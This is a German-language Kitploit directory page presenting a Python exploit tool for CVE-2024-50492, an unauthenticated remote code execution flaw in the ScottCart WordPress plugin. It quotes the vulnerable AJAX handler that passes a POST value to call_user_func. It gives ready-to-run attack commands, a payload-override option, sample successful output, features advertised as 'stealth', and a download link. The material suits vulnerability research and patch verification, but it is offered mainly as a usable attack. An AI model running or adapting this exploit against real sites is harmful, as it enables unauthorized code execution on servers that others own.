Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Nicht authentifizierte Remote-Codeausführung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2024-50492
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Nicht authentifizierte Remote-Codeausführung

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE-Exploit

🔥 Exploit-Skript für ScottCart <= 1.1 - Nicht authentifizierte Remote-Codeausführung
🧑‍💻 Von Nxploit – Khaled Alenazi


📌 Beschreibung

Das ScottCart-Plugin für WordPress (Versionen ≤ 1.1) ist anfällig für Remote Code Execution (RCE).
Dadurch können nicht authentifizierte Angreifer über einen verwundbaren AJAX-Endpunkt beliebige PHP-Funktionen auf dem Server ausführen.

  • Plugin: ScottCart ≤ 1.1
  • Verwundbarkeit: Nicht authentifizierte Funktionsinjektion → RCE
  • CVE: CVE-2024-50492
  • CVSS-Score: 9.8 – Kritisch

🧠 Wie es funktioniert

Das Plugin registriert eine ungeschützte AJAX-Aktion:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Welche Folgendes ausführt:

root@kitploit:~
call_user_func($_POST['function']);

Dadurch können Angreifer beliebige vorhandene PHP-Funktionen aufrufen, wie zum Beispiel:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← falls in modifizierten Umgebungen erweitert

🚀 Exploit-Funktionen

  • ✅ Sendet automatisch einen manipulierten Payload, um den verwundbaren Endpunkt auszulösen
  • ✅ Ermöglicht Funktionsüberschreibung per Argument
  • ✅ Standard-Payload: phpinfo() für den PoC
  • ✅ Speichert die Ausgabe in einer Datei mit Zeitstempel (z. B. results_2025-03-26_14-33-01.txt)
  • ✅ Benutzerdefinierter User-Agent, Fehlerbehandlung und SSL-Ignorierung für Tarnung

🖥️ Verwendung

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 Beispiele

🔍 Standardverhalten (PoC mit phpinfo()):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 Interne Plugin-Funktion aufrufen:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 Beispielausgabe

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 Und gespeichert in: results_2025-03-26_14-33-01.txt


🛡️ Haftungsausschluss

Dieses Tool dient ausschließlich Bildungs- und autorisierten Testzwecken.
Verwende es nicht gegen Systeme, die dir nicht gehören oder für die du keine ausdrückliche Erlaubnis zum Testen hast.


💬 Danksagung

  • 💻 Exploit von: Nxploit – Khaled Alenazi
  • 🛡️ CVE-ID: CVE-2024-50492
Tool herunterladen